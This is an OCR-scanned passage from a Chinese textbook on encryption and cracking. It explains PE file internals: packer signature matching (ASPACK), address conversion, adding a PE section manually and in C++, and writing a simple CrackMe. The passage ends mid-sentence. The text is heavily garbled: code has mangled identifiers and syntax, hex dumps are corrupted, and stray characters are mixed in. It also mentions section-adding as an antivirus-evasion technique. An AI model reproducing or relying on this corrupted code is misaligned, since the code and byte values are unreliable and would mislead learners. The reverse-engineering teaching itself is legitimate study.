NG4NXK947 


// ASPACK 
"ASPACK", 
"\x60\xE8\x03\x00\x00\x00\xE9\xEB\x04\x5D" \ 
mnNzd4oNx55ANxC3SNXSRNXOINROOANSOONZOONSREBNSDT AN 
"\xBB\xED\xFF\XEFEF\xXFF\xX03\xDD\x8L\xEB\xO0" 
MNxCONxOLM 

Po 


程序 界面 是 在 PE 查看 器 的 基础 上 完成 的 ， 如 图 6-32 所 示 。 








ee Pack .exe 
A 中: per 2 
了 全 六 让 4 [060 文件 入 潮 、00 









.rsre | OOD19000 00002000 00001C00 QO000800 .C. 
nnnLROnNe, D0001D00 0D0000000 00000000 C 
60002000 00002200 00001800 C 

”60001000 00000000 | 00000000 Cw 
上 






图 6-32 查 这 程序 结果 


提取 特征 码 后 ， 查 壳 工作 只 剩 特征 码 匹 配 了 。 这 非常 简单 ， 只 要 用 文件 的 入 口 处 代码 和 
特征 码 进 行 区 配 ， 匹 配 相 同 就 会 给 出 相应 的 信息 。 查 吝 的 代码 如 下 : 


VOID CpeparseDlg: :GetPelinfo'() 


1 
PBYTE pSign = NULL; 


/定位 文件 六 加 位置 
PSign = (PBYTE) ( (DWORD)m lpBase 
+ m pNtHdr->OptionalHeader.AddressOfEntryPoint); 


// 比较 入 口 特征 码 
if (memcemp(Signl0l.bSsign, pSign, SIGNLEN) == 0 ) 
; SetDlgItemText (IDC. EDIT PEINFO, Sign[0l.szName); 
1 ifl( memomp (Sian[ti] .bsSign, psign, STONLEN) 二 = ) 
, SetDplgltemText (TDC, EDIT PRINEO, Signl1l] .szName); 
2 
， SetDlgTtemnext (1DC,EDIT PEINEO，M 未知 网 》 

} 


这 样 ， 查 壳 程 序 的 功能 就 完成 了 。 在 程序 中 提取 的 特征 码 的 长 度 为 32 字 节 ， 由 于 
这 里 只 是 一 个 简单 的 例子 , 读者 在 提取 特征 码 的 时 候 ,为 了 提高 准确 率 , 需要 多 进行 一 些 
测试 。 





> 
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6.4.3 ”地 址 转换 器 


前 面 介绍 了 关于 PE 文件 的 3 种 地 址 ， 分 别 是 VA“〈 虚 拟 地 址 )、RVA (相对 虚拟 地 址 ) 
和 FileOffset 文件 偏 移 地 址 )。 这 3 种 地 址 的 转换 如 果 始 终 使 用 手动 来 计算 会 非常 累 ， 因 此 
通常 的 做 法 是 借助 工具 来 完成 。 前 面 介绍 了 使 用 LordPE 来 计算 这 3 种 地 址 的 转换 ， 现 在 来 
编写 一 个 对 这 3 种 地 址 进行 转换 的 工具 。 该 工具 如 图 6-33 所 示 。 

这 个 工具 是 在 前 两 个 工具 的 基础 上 完成 的 。 因 此 , 在 进行 计算 的 时 候 , 应 该 先 要 进行 “ 查 
看 ”， 再 进行 “计算 ”。 和 否则 ， 该 获取 的 指针 还 没有 获取 到 。 

在 界面 上 ， 左 边 的 3 个 按钮 是 “ 单 选 框 ” 单 选 框 的 设置 方法 如 图 6-34 所 示 。 


|_ 节 名 ] 也 偏 称 .| Y 大 小 下 仿 称 | 区 大 小 二 标志 . 

全 让 00 生生 

0 [ 
0 950 DO 和 














图 6-33 地址 转换 器 图 6-34 对 单 选 框 的 设置 


3 个 单 选 框 中 只 能 有 一 个 是 选中 状态 ， 为 了 记录 哪个 单 选 框 是 选中 状态 ， 在 类 中 定义 一 
个 成 员 变量 m_nSelect。 对 3 个 单 选 框 ， 分 别 使 m_nSelect 值 为 1、2 和 3。 关 于 界面 的 编程 ， 
请 读者 参考 源 代码 ， 这 里 就 不 进行 过 多 的 介绍 了 。 下 面 来 看 主要 的 代码 。 

在 单 击 “ 计 算 ” 按 钮 后 ， 响 应 该 按钮 的 代码 如 下 : 


void CPeParseDlg: :OnBtnCalc () 
{ 
// TODO: Add your control notification handler code here 
DWORD dwAddr = 0; 
// 获取 的 地 址 
dwaAddr = GetAddr (); 


// 地 址 所 在 的 节 
int ninNum = GetAddrIinSecNum (dwAddr); 


// 计算 其 他 地 址 
CalcAddr (niInNum, dwAddr); 
} 


分 别 看 一 下 GetAddr()、GetAddrInSecNum() 和 CalcAddr() 的 实现 。 
获取 在 编辑 框 中 输入 的 地 址 内 容 的 代码 如 下 : 


DWORD CPeParseDlg::GetAddr() 
{ 

char szAddr[10] = {0 }; 

DWORD dwaAddr = 0; 

Switch ( mnSelect ) 

{ 

Case 1: 

{ 





遇 和 长 灯 遇 车 ”山中 庆 








第 6 章 加密 与 解密 








坪 坑 帅 晤 对 届 四 站 


| 


GetDlgIitemText (IDC EDIT VA, szAddr, 10); 
HexStrToInt (szAddr, &dwAddr); 


break; 
} 
Case 2; 
{ 
GetDilgItemText (IDC EDIT RVA, szAddr, 10); 
HexStrToInt (szAddr, &dwAddr); 
break; 
} 
Case 3° 


GetDlglitemText (IDC_ EDIT FILEOQOFFSET, SzAddr, 10); 
HexStrToInt (szAddr, &dwAddr); 
break; 


} 


return dwAaAddr; 


} 
获取 该 地 址 所 属 的 第 几 个 节 的 代码 如 下 : 
int CPeParseDlg: :GetAddrIinsecNum (DWORD dwAddr) 
{ 
int nInNum = 0; 
int nSecNum = mpNtHdr->FileHeader.NumberOfSections; 


switch ( m nSelect ) 


{ 


Case 3 
{ 
DWORD dwIimageBase = m pNtHdr->OptionalHeader.ImageBase; 
for ( ninNum = 0; niInNum < nSecNum; niIinNum ++ ) 
{ 
if ( dwAddr >= dwImageBase + m pSecHdr[nInNum] .VirtualAddress 
&& dwAddr <= dwImageBase + mpSecHdr[nInNum] .VirtualAddress 
+ m pSecHadr[nIinNum] .Misc,.VirtualSize) 
{ 
return nInNem; 
} 
} 
break; 
} 
Case 2: 
{ 
for ( ninNum = 0; nInNum < nSecNum; nInNum ++ ) 
{ 
if { dwAddr >= m pSecHdr[nIinNum] .VirtualAddress 
&& dwAddr <= m pSecHdr[nIinNum] .VirtualAddress 
+ m pSecHdr [nInNum] ;Misc.VirtualSize) 
{ 
return nIinNum; 
} 
} 
break; 
} 
Case 3: 


for ( nInNum = 0»; nInNum < nSecNum; nInNum ++ ) 
if ( dwaAddr >= m pSecHdr [ninNum] .PointerToRawData 
&& dwAddr <= m pSecHdr [ninNum] .PointerToRawData 
+ m pSecHadr [INum] .SizeOfRawData) 


return ninNum; 
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break; 
} 
} 第 
return -1 6 
S13 
: 章 
计算 其 他 地 址 的 代码 如 下 : 加 
VOID CPeParseDlg: :CalcAddr (int ninNum, DWORD dwAddr) 密 
{ 与 
DWORD dwVa = 0; 解 
DWORD dwRva = 0; 密 
DWORD dwFileOffset = 0; 
Switch ( mnselect ) sy 
{ 
case, 1: 
{ 
dwVa = dwAddr; 
dwRva = dwVa - m pNtHdr->OptionalHeader.1ImageBase; 
dwFileOffset = m pSecHdr [ninNum] .PointerToRawData 
+ (dwRva ~ m pSecHdr[nInNum] .VirtualAddress); 
break; 
} 
case 2; 
{ 
dwVa = dwAddr + m pNtHdr->OptionalHeader.TImageBase; 
dwRva = dwAddr; 
GwFileOffset = m pSecHdr[nInNum] .PointerToRawData 
+ (dwRva - m pSecHdrInIinNum] .VirtualAddress); 
break; 
} 
Case, 33 


dwFileOffset = dwAddr; 
dwRva = m pSecHdr[nInNum] .VirtualAddress 
+ (dwFileOffset - m pSecHdrInInNum] .PointerToRawData); 
dwVa = dwRva + m pNtHdr->OptionalHeader.ImageBase; 
break; 


} 
SetDlgitemText (IDC EDIT SECTION, (const ‘char *)m pSecHdr[nIinNum] .Name); 


CSstring str; 
str.Format ("%08X", dwVa)s 
SetDlgItemText (IDC EDIT VA, str); 


str.Format ("$08X", dwRva)? 
SetDlgItemText (IDC EDIT RVA, str); 


str,.Format ("%08X", dwFiljeOffset); 
SetDlgItemText (IDC EDIT FILEOFESET, Str)} 
} 


代码 都 不 复杂 ， 关 键 就 是 CalcAddr0 中 3 种 地 址 的 转换 。 如 果 读 者 没 能 理解 代码 ， 请 参 
考 前 面 手动 转换 3 种 地 址 的 方法 ， 这 里 就 不 进行 介绍 了 。 


6.4.4 添加 节 区 


添加 节 区 在 很 多 场合 都 会 用 到 ， 比 如 在 加 壳 中 、 在 免 杀 中 都 会 经 常用 到 对 PE 文件 添加 
一 个 节 区 。 添 加 一 个 节 区 的 方法 有 4 步 ， 第 1 步 是 在 节 表 的 最 后 面 添加 一 个 IMAGE_SECTI 
ON _HEADER， 第 2 步 是 更 新 IMAGE FILE HEADER 中 的 NumberOfSections 字段 , 第 3 步 
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是 更 新 IMAGE_OPTIONAL HEADER 中 的 SizeOfImage 字段 ， 最 后 一 步 则 是 添加 文件 的 数 
据 。 当 然 ， 前 3 步 是 没有 先后 顺序 的 ， 但 是 最 后 一 步 一 定 要 明确 如 何 改变 。 


注 : 某 些 情况 下 ， 在 添加 新 的 节 区 项 以 后 会 向 新 节 区 项 的 数据 部 分 添加 一 些 代码 ， 而 这 些 代码 可 能 要 求 在 程 
序 执行 之 前 就 被 执行 ， 那 么 这 时 还 需要 更 新 IMAGE_OPTIONAL_HEADER 中 的 AddressOfEntryPoint 字段 。 


1. 手动 添加 一 个 节 区 

先 来 进行 一 次 手动 添加 节 区 的 操作 ， 这 个 过 程 是 个 熟悉 上 述 步 又 的 过 程 。 网 上 有 很 多 现 
成 的 添加 节 区 的 工具 。 这 里 自己 编写 工具 的 目的 是 掌握 和 了 人 解 其 实现 方法 ， 锻 炼 编程 能 
手动 添加 节 区 是 为 了 巩固 前 面 的 知识 ， 熟 悉 添 加 节 区 的 步 又 。 

接 下 来 还 是 使 用 前 面 的 测试 程序 。 使 用 C32Asm 用 十 六 进 制 编辑 方式 打开 这 个 程序 ， 并 
定位 到 其 节 表 处 ， 如 图 6-35 所 示 。 


68669661B98:| 88 88 99 88 88 96 99 89 88 99 88 86 88 90 86 99 | -----.--------.- 
:||2El74 65 78 74 89 88 699 CE 35 86 89 89 19 86 69 
:| 60 40 088 99 16 99 90 88 69 66 99 600 60 699 69 
:| 89 99 99 99 28 699 中 司 |26 72 64 51 74 61 69 69 
:|pE 97 68 88 88 58 68 99 66 18 69-99 689 58 88 89 
:| 68 69 68 69 69 08 90 090 99 09 99 99 46 90 本 可 
:| EPE 61 74 61 689 99 99 FC 29 68 88 88 68 89 69 


:| B86 38 98 88 88 99 88 099 86 99 68 88 868 
:| 66 80 99 00 #8 88 9gl CO |06 99 99 68 66 68 680 88 


图 6-35” 节 表 位 置信 息 


遇 改 灯 遇 车 贡品 小 


| 






























从 图 6-35 中 可 以 看 到 ， 该 PE 文件 有 3 个 节 表 。 直 接 看 十 六 进 制 信息 可 能 很 不 方便 (看 
多 了 就 习惯 了 )， 为 了 直观 方便 地 查看 节 表 中 IMAGE_SECTION_HEADER 的 信息 ， 那 么 使 
用 LordPE 进行 查看 ， 如 图 6-36 所 示 。 





ER RE Si 
00001000 000035CF 00001000 D0004000 B0000020 
Do0005000 D00007DF 00005000 00001000 40000040 
D0008000 0D00029FC D0006000 D0003000 C0000040 





图 6-36 使 用 LordPE 查看 该 节 表 信息 





用 LordPE 工具 查看 的 确 直 观 多 了 。 对 照 LordPE 显示 的 节 表 信息 来 添加 一 个 节 区 。 回 顾 
一 下 IMAGE SECTION HEADER 结构 体 的 定义 ， 具 体 如 下 : 


typedef struct IMAGE SECTION, HEADER { 
BYTE Name [IMAGE SIZEOF SHORT NAME]; 
Bananit 
DWORD ~ PhysicalAddress; 
DWORD VirtualSize; 
|] Msecy 
DWORD VirtualAddress; 
DWORD SizeOfRawData; 
DWORD PointerToRawData; 
DWORD PointerToRelocations; 
DWORD PointerToLinenumbers; 
WORD NumberOfRelocations; 
WORD NumberOfLinenumbers; 
DWORD Characteristics; 
} IMAGE SECTION HEADER, *PIMAGE SECTION HEADER; 


IMAGE SECTION_HEADER 结构 体 的 成 员 很 多 ， 但 是 真正 要 使 用 的 只 有 6 个 ， 分 别 是 





人 - 
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Name、 VirtualSize、VritualAddress、SizeOfRawData、PointerToRawData 和 Characteristics 。 
这 6 项 刚好 与 LordPE 显示 的 6 项 相同 。 其 实 IMAGE _ SECTION HEADER 结构 体 中 其 余 的 
成 员 几乎 不 被 使 用 。 下 面 介 绍 如 何 添加 这 些 内 容 。 

IMAGE _ SECTION_HEADER 的 长 度 为 40 字 节 ， 是 十 六 进 制 的 0x28， 在 C32Asm 中 占 
用 2 行 半 的 内 容 ， 这 里 一 次 把 这 两 行 半 的 内 容 手 动 添加 进去 。 回 到 C32Asm 中 ， 在 最 后 一 
节 表 的 位 置 处 开始 添加 内 容 ， 首 先 把 光标 放 到 右边 的 ASCI 字符 中 ,输入 “.test”， 如 图 6-37 
所 示 。 










86668228:| 66 38 88 86 88 68 86 80 ABRADL 
866999236:| 88 99 88 898 #8 898 88 C0|2E Zh 大 7 加 全 o0 0 
88666248:| 69 99 99 66 99 88 99 68 Gy G0 0 日 日 










i 





6-37 添加 “.test” 节 名 


接 下 来 在 00000240 位 置 处 添加 节 的 大 小 , 该 大 小 直接 是 对 齐 后 的 大 小 即 可 。 由 于 文件 对 
齐 是 0x1000 字 节 ， 也 就 是 4096 字 节 ， 那 么 采用 最 小 值 即 可 ,使 该 值 为 0x1000。 不 知道 读者 
是 否 还 记得 前 面 提 到 的 字 节 顺序 的 问题 ， 在 C32Asm 中 添加 时 ,正确 的 添加 应 当 是 “00 10 00 
00”， 以 后 添加 时 也 要 注意 字 节 顺序 。 在 添加 后 面 几 个 成 员 时 ， 不 再 提示 注意 字 节 顺序 ， 读 者 
应 时 刻 清楚 这 点 。 在 添加 该 值 时 ， 应 当 将 光标 定位 在 十 六 进 制 编辑 处 ， 而 不 是 刚才 所 在 的 
ASCII 字符 处 。 顺 便 要 把 VirutalAddress 也 添加 上 ，VirtualAddress 的 值 是 前 一 个 节 区 的 起 始 
位 置 加 上 上 一 个 节 对 齐 后 的 长 度 的 值 ， 上 一 个 节 区 的 起 始 位 置 为 0x6000， 上 一 个 节 区 对 齐 后 
的 长 度 为 0x3000， 因 此 新 节 区 的 起 始 位 置 为 0x9000。 添 加 VirtualSize 和 VirtualAddress 后 如 
图 6-38 所 示 。 









88900240:| [on 16 88 9 99 90 99 Bq 00 88 96 99 99 99 99 69 


69666238:| 99 6869 9099 69 46 896 6 9 2E 74 65 73 74 68 68 8 ee 
569906256:| 99 868 86 89 86 686 89 88 90 88 88 88 66 80 80 00 








6-38 添加 VirtualSize 和 VirtualAddress 的 值 


接 下 来 的 两 个 字段 分 别 是 SizeOfRawData 和 PointerToRawData， 其 添加 方法 类 似 前 面 两 
个 字段 的 添加 方法 ， 这 里 就 不 细 说 了 。 分 别 添加 “0x9000” 和 “0x1000” 两 个 值 ， 如 图 6-39 
所 示 。 


:| 88 38 G8 96 86 68 96 B86 86 88 68 686 68 99 69 60 
5:| 88 896 898 898 46 90 08 £8 MB. B.A 


-0 。 
5 A 7 
:| 88 18 89 8 90 99 88 090| G8 19 80 BB 09 90 人 do 是 


:| 99 68 99 98 686 686 88 86 86 68 68 $66 99 86 98 86 








图 6-39 添加 SizeOfRawData 和 PointerToRawData 


PointerToRawData 后 面 的 12 字 节 都 可 以 为 0， 只 要 修改 最 后 4 字 节 的 内 容 ， 也 就 是 
Characteristics 的 值 即 可 。 这 个 值 直 接 使 用 上 一 个 节 区 的 值 即 可 ， 实 际 添加 时 应 根据 所 要 节 的 
属性 给 值 。 这 里 为 了 省 事 而 直接 使 用 上 一 个 节 区 的 属性 ， 如 图 6-40 所 示 。 





8:| 89 68 88 ED 898 98 88 89 88 88 88 88 88 90 B68 


图 6-40 ”添加 Characteristics 属性 
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整个 节 表 需要 添加 的 地 方 就 添加 完成 了 ， 接 下 来 需要 修改 该 PE 文件 的 节 区 数量 。 当 前 
节 区 数量 是 3， 这 里 要 修改 为 4。 虽然 可 以 通过 LordPE 等 修改 工具 完成 ， 但 是 这 里 仍然 使 用 
手动 修改 。 对 于 修改 的 位 置 ， 请 读者 自行 定位 找到 ， 修 改 如 图 6-41 所 示 。 


99886689:| 89 696 98 69 90 99 88 88 98 69 88 99 99 99 89_68 
888689C9:| 88 99 69 09 99 80 99 89 58 45 88 88 4C 81 





88686999D68:| B8 36 31 51 80 899 88 68 68 88 68 99 EQ 99 9F 81 


图 6-41 修改 节 区 个 数 为 4 


除了 节 区 数量 以 外 ， 还 要 修改 文件 映像 的 大 小 ， 也 就 是 前 面 提 到 的 SizeOfImage 的 值 。 
由 于 新 添加 了 节 区 , 那么 应 该 把 该 节 区 的 大 小 加 上 SizeOfImage 的 大 小 , 即 为 新 的 SizeOfImage 
的 大 小 。 现在 的 SizeOfImage 的 大 小 为 0x9000, 加 上 新 添加 节 区 的 大 小 为 0xa000。SizeOfImage 
的 位 置 请 读者 自行 查找 ， 修 改 如 图 6-42 所 示 。 


:| 88 19 89 988 89 18 98 G084 lA ss 89 88 88 
:| en 88 68 B8 689 98 88 89 89 he 09 86j6986 18 96 88 





88888129:| 86 99 $6 868 82 99 86 86 96 $9 19 08 86 18 98 69 


6-42 ”修改 SizeOfImage 的 值 为 0xa000 





修改 PE 结构 字段 的 内 容 都 已 经 做 完了 ， 最 后 一 步 就 是 添加 真实 的 数据 。 由 于 这 个 节 区 
不 使 用 ， 因 此 填充 0 值 就 可 以 了 ,文件 的 起 始 位 置 为 0x9000， 长度 为 0x1000。 把 光标 移 到 文 
件 的 末尾 ， 单 击 “ 编 辑 ” 一 “插入 数据 ”命令 ， 在 “插入 数据 大 小 ”文本 框 中 输入 十 进 制 的 
4096， 也 就 是 十 六 进 制 的 0x1000， 如 图 6-43 所 示 。 

单 击 “ 确 定 ” 按 钮 ， 可 以 看 到 在 刚才 的 光标 处 插入 了 很 多 0 值 ， 这 样 工作 也 完成 了 。 单 
击 “ 保 存 ” 按 钮 进行 保存 ， 提 示 是 否 备份 ， 选 择 “ 是 ”然后 用 LordPE 查看 添加 节 区 的 情况 ， 
如 图 6-44 所 示 。 














图 6-43 “插入 数据 ”对 话 框 的 设置 图 6-44 添加 新 的 节 区 信息 


对 比 前 后 两 个 文件 的 大 小 ， 如 图 6-45 所 示 。 

从 图 6-45 中 可 以 看 出 , 添加 节 区 后 的 文件 比 原来 的 文件 大 了 4KB, 这 是 由 于 添加 了 4096 
字 节 的 0 值 。 也 许 读者 最 关心 的 不 是 大 小 问题 ， 而 是 软件 
添加 了 大 小 后 是 否 真 的 可 以 运行 。 其 实 试 运行 一 下 ， 是 可 
以 运行 的 。 

上 面 的 整个 过 程 就 是 手动 添加 一 个 新 节 区 的 全 部 过 
程 ， 除 了 特有 的 几 个 步骤 以 外 ， 要 注意 新 节 区 的 内 存 起 始 位 置 和 文件 起 始 位 置 的 值 。 相 信 通 过 
上 面 手动 添加 节 区 ， 读 者 对 此 已 经 非常 熟悉 了 。 下 面 就 开始 通过 编程 来 完成 添加 节 区 的 任务 。 





图 6-45 添加 节 区 前 后 文件 的 大 小 
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补充 在 C32Asm 软件 中 可 以 快速 定位 PE 结构 的 各 个 结构 体 和 字段 的 位 置 ， 在 菜单 栏 


单 击 “ 查 看 (V)”-> “PE 信息 (P)” 即 可 在 C32Asm 工作 区 的 左 侧 打 开 一 个 PE 结构 字段 的 解 | 第 
析 面 板 ， 在 面板 上 双击 PE 结构 的 每 个 字段 则 可 在 C32Asm 工作 区 中 定位 到 十 六 进 制 形式 的 来 
PE 结构 字段 的 数据 。 二 
2. 通过 编程 添加 节 区 密 
通过 编程 添加 一 个 新 的 节 区 无 非 就 是 文件 相关 的 操作 ， 只 是 多 了 一 个 对 PE 文件 的 解析 是 
和 操作 而 已 。 添 加 节 区 的 步骤 和 手动 添加 节 区 的 步骤 是 一 样 的 ， 只 要 一 步 一 步 按 照 上 面 的 步 | 密 
又 写 代码 就 可 以 了 。 在 开始 写 代 码 前 ， 首 先 修改 FileCreate() 函 数 中 的 部 分 代码 ， 有 具体 如 下 : 
m hMap = CreateFileMappirng (mn hrile, NUEL, Pe 


PAGE READWRITE /*| SEC IMAGE*/, 
Oe 
if ( m hMap == NULL ) 
{ 
CloseHandle (m hFile); 
return bRet; 
} 


这 里 要 把 SEC_IMAGE 宏 注 释 掉 。 因 为 要 修改 内 存 文件 映射 ， spE= 3 
有 这 个 值 会 使 添加 节 区 失败 ， 因 此 要 将 其 注释 掉 或 者 直接 删除 掉 。 | 臣 | 

程序 的 界面 如 图 6-46 所 示 。 人 

首先 编写 “添加 ”按钮 响应 事件 ， 代 码 如 下 : 站 


void CPeParseDlg: :OnBtnAddSection() 


{ 
// 在 这 里 添加 驱动 程序 
// 节 名 
char szSecName[8] = { 0 }; 
// 节 大 小 


int nSecSize = 0; 








GetDlgIltemText (IDC EDIT SECNAME, szSecName, 8); 
nSecSize = GetDlgItemInt (IDC EDIT SEC SIZE, FALSE, TRUE); 


AddSec(szSecName, nSecSize); 


] 

按钮 事件 中 最 关键 的 地 方 是 AddSec0 函 数 。 该 函数 有 两 个 参数 ， 分 别 是 添加 节 的 名 称 与 添加 
节 的 大 小 。 这 个 大 小 无 论 输 入 多 大 ， 最 后 都 会 按照 对 齐 方式 进行 向 上 对 齐 。 看 一 下 AddSec0) 函 
数 的 代码 ， 有 具体 如 下 : 


VOID CPeParseDlg: :AddSec (char *szSecName, int nSecSize) 

{ 
int nSecNum = m pNtHdr->FileHeader.NumberOfSections’; 
DWORD dwFrileAlignment = m pNtHdr->O0ptionalHeader,.FileAlignment; 
DWORD dwSecAlignment = m pNtHdr->OptionalHeader.SectionAlignment; 


PIMAGE SECTION HEADER pTmpSec = m pSecHdr + nSecNum; 


// 复制 节 名 

strncpy( (char *)pTmpSec->Name, szSecName, 7); 

// 节 的 内 存 大 小 

pTmpSec->Misc.VirtualSize = AlignSize (nSecSize, dwSecAlignment); 

// 节 的 内 存 起 始 位 置 
pTmpSec->VirtualAddress=m pSecHdr [nSecNum-1] .VirtualAddress+AlignSize (m pSecHdr 
[nSecNum - 1] .Misc.VirtualSsize, dwSecAlignment)» 

/7 节 的 文件 大 小 

PTmpSec->SizeofRawData = AlignsSize (nSecsize, dwFileAlignment); 

// 节 的 文件 起 始 位 置 


pTImpSec->PointerToRawData=m pSecHdr [nSecNum-1] .PointerToRawData+AlignSize (m psSe 
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cHdr [nSecNum — 1].SizeOfRawData, dwSecAlignment); 


6 // 修正 节 数 量 
章 m_pNtHdr->FileHeader.NumberOfSections 十 +7 
/7 修正 映像 大 小 
加 m pNtHAr->OptionalHeader.SizeOfImage += pTmpSec->Misc.VirtualSize; 
5 FlushViewOfFile (m lpBase, 0):; 
解 /7 添加 节 数 据 
密 AddSecData (pTmpSec->SizeOfRawData); 
EnumSections'(); 
A 


} 

代码 中 每 一 步 都 按照 相应 的 步骤 来 完成 ， 其 中 用 到 的 两 个 函数 分 别 是 AlignSize() 和 
AddSecData()。 前 者 是 用 来 进行 对 齐 的 ， 后 者 是 用 来 在 文件 中 添加 实际 的 数据 内 容 的 。 这 两 
个 函数 非常 简单 ， 代 码 如 下 : 


DWORD CPeParseDlg::AlignSsize(int nSecsize, DWORD Alignment) 
{ 
int nSize = nSecSize; 
if (nSize % Alignment != 0 ) 
' 
nSecsize = (nSize / Alignment + 1) * Alignment; 


return nSecSize; 


} 


VOID CPeParseDlg::AddSecData (int nSecSize) 
{ 
PBYTE pByte = NULL; 
pByte = (PBYTE)malloc'(nSecSize); 
ZeroMemory (pByte, nSecSize): 


DWORD dwNum = 0; 

SetFilePointer(m hFile, 0, 0, FILE END); 
WriteFile(m hrFile, pByte, nSecSize, &dwNum, NULL); 
FlushFileBuffers(m hFile); 


free (pByte); 


} 
整个 添加 节 区 的 代码 就 完成 了 ， 仍 然 使 用 最 开始 的 那个 简单 程序 进行 测试 ， 看 是 否 可 以 
添加 一 个 节 区 ， 如 图 6-47 所 示 。 





te ee ey 
ADN: TE 册 1 后 : I 
Cr | 

[Ev 全 区 | 类 小 | 太 仿 检 | 训 天 水 | 有 


taxt 0D0001000 000035CE | 00001000 “00004000 8 区 科 
rduta 00005000 DO0007DE 00005000 00001000 4 














图 6-47 添加 节 区 








6.5 破解 基础 知识 及 调试 API 函数 的 应 用 





从 图 6-47 中 可 以 看 出 , 添加 节 区 是 成 功 的 。 试 着 运行 一 下 添加 节 区 后 的 文件 ， 可 以 正常 
运行 ， 而 且 添 加 节 区 的 文件 比 原 文件 大 了 4KB， 和 前 面 手动 添加 的 效果 是 一 样 的 。 

至 此 ， 对 PE 文件 结构 的 介绍 就 结束 了 。 其 实 ，PE 文件 结构 还 有 很 多 比较 重要 的 内 容 ， 
但 是 这 里 只 介绍 了 一 些 基 础 的 知识 。 至 于 其 他 的 内 容 , 请 读者 自行 学 习 。PE 结构 查看 器 最 关 
键 的 是 兼容 性 ，PE 结构 是 可 以 进行 各 种 变形 的 。 和 常规 的 PE 结构 也 许 比较 好 解析 ， 但 是 经 过 
变形 的 PE 结构 解析 起 来 就 可 能 会 出 错 ， 因 此 要 不 断 地 尝试 去 解析 不 同 的 PE 文件 结构 ，PE 
查看 器 兼容 性 才 会 不 断 地 完善 。 前 面 介 绍 了 通过 C32Asm 手动 分 析 PE 文件 结构 ， 这 种 方法 
有 助 于 完善 PE 查看 器 。 这 就 好 比 数 据 恢 复 一 样 ， 数 据 恢 复 高 手 绝对 不 是 简单 地 通过 数据 恢 
复工 具 来 进行 。 虽 然 高 手 也 在 使 用 工具 ， 但 是 如 果 遇 到 较为 复杂 的 情况 ， 数 据 恢 复工 具 可 能 
就 会 显得 无 力 ， 那 么 手动 分 析 文 件 系统 格式 将 是 唯一 的 方法 。 
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在 介绍 完 PE 文件 结构 以 后 ， 接 下 来 介绍 调试 API。 调 试 API 是 系统 留 给 用 户 进行 程序 
调试 的 接口 ， 其 功能 非常 强大 。 在 介绍 调试 API 以 前 ， 先 来 回顾 一 下 OD 的 使 用 。OD 是 用 
来 调试 应 用 程序 的 强大 的 工具 。 第 5 章 中 对 其 进行 了 简单 的 介绍 ， 本 章 中 将 通过 实例 来 回顾 
其 强大 功能 。 同 样 ， 为 了 后 续 的 部 分 较 容易 理解 ,这 里 写 一 个 简单 程序 ， 用 OD 来 进行 调试 。 
除了 介绍 调试 API 以 外 ， 还 会 介绍 一 些 简单 的 与 破解 相关 的 内 容 。 当 然 ， 破 解 是 一 个 技术 的 
积累 ， 也 是 要 靠 多 方面 技术 的 综合 应 用 ， 希 望 这 些 简 单 的 基础 知识 能 给 读者 起 到 一 个 抛 砖 引 
玉 的 作用 。 


6.5.1 CrackMe 程序 的 编写 


下 面 将 写 一 个 CrackMe 程序 ，CrackMe 的 意思 是 “来 破解 我 " 这 里 提 到 的 破解 是 针对 
软件 方面 来 说 的 , 不 是 网 络 中 的 破解 。 对 于 软件 的 破解 来 说 , 主要 是 解除 软件 中 的 各 种 限制 |， 
比如 时 间 限 制 、 序 列 号 限制 …… 对 于 破解 来 说 ， 无 疑 与 逆向 工程 有 着 密切 的 关系 ， 想 要 突破 
任何 一 种 限制 都 要 去 了 解 该 种 限制 的 保护 方式 或 保护 机 制 。 

破解 别人 的 软件 属于 侵权 行为 ， 尽 管 有 很 多 人 在 做 这 样 的 事情 ， 但 是 大 多 人 数 是 为 了 进 
行 学习 研 究 ， 而 非 用 于 牟取 商业 利益 。 因 此 ， 为 了 尊重 他 人 的 劳动 成 果 ， 也 为 了 避免 给 自己 
带 来 不 必要 的 麻烦 ， 读 者 尽 可 能 找 一 些 CrackMe 来 进行 学 习 和 研究 。 

下 面 来 写 一 个 非常 简单 的 CrackMe 程序 ， 并 进行 “ 破 
解 "。 自 己 写 CrackMe 并 破解 ， 虽 然 这 样 省 去 了 很 多 问题 
的 思考 ， 但 是 对 于 初学 者 来 说 仍然 是 一 件 非常 有 趣 的 事情 。 

这 个 程序 使 用 MFC 来 编写 ， 界 面 如 图 6-48 所 示 。 

从 图 6-48 中 可 以 看 出 ， 整 个 程序 只 有 两 个 可 以 输入 内 
容 的 文本 编辑 框 和 两 个 可 以 单 击 的 按钮 ， 除 此 之 外 什么 都 。 图 648 自己 编写 的 CrackMe 程序 界面 
没有 ， 更 不 会 有 什么 提示 。 基 本 上 这 就 是 一 个 CrackMe 的 样子 。 不 过 有 的 人 习惯 在 CrackMe 
中 添加 一 个 美女 的 照片 ， 让 界面 显得 美观 诱惑 ， 有 的 人 喜欢 给 CrackMe 加 层 壳 来 增加 破解 的 
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难度 , 不 过 这 些 不 重要 , 关键 是 要 进行 学 习 。 在 界面 上 输入 一 个 账号 和 一 个 密码 ， 当 单 击 “ 确 


定 ” 按 钮 后 ， 该 按钮 会 执行 以 下 代码 : 
void CEasyCrackMeDlg: :OnBtnReg () 
{ 
// TODO: Add your control notification handler code here 
char szUser [MAXBYTE] = { 0 }; 
char szPassword[MAXBYTE] = { 0 }; 
char szTmpPassword[MAXBYTE] = { 0 }; 


// 获取 输入 的 账号 和 密码 
GetDlgItemText'(IDE EDIT USER, ‘szUser, MAXBYTE); 
GetDlgIitemText (IDC EDIT PASSWORD, szPassword, MAXBYTE); 


// 判断 账号 是 否 为 空 
if ( strlen(szUser) == 0 ) 
i 


return, 3 


} 
// 判断 密码 是 否 为 空 


if ( strlen(szPassword) == 0 ) 
f 
FetUrIT 2 


} 
// 判断 账号 长 度 是 否 小 于 7 


df ( strlen(szUsery < ) 
{ 


rn 


: 
// 根据 账号 生成 密码 


fur (int d= ils istrLen (ssUeee) lt 
{ 


if ( szUserl[li] == '2' 
1| szUser[i] == 721 
1| szUser[li] == '9" ) 
{ 
szTmpPassword[i] = szUserlil]; 
} 
else 


{ 
szTmpPassword[i] = szUser[i] + 1 


} 
} 


// 把 生成 的 密码 和 输入 的 密码 进行 匹配 


if ( strcmp(szTmpPassword; szPassword) == 0 ) 


MessageBox ("密码 正确 ") ; 
is 
MessageBox (" 密 码 错误 ") ; 
下 


整个 代码 非常 简单 。 这 段 代 码 是 通过 输入 的 账号 来 生成 密码 的 ， 而 不 是 


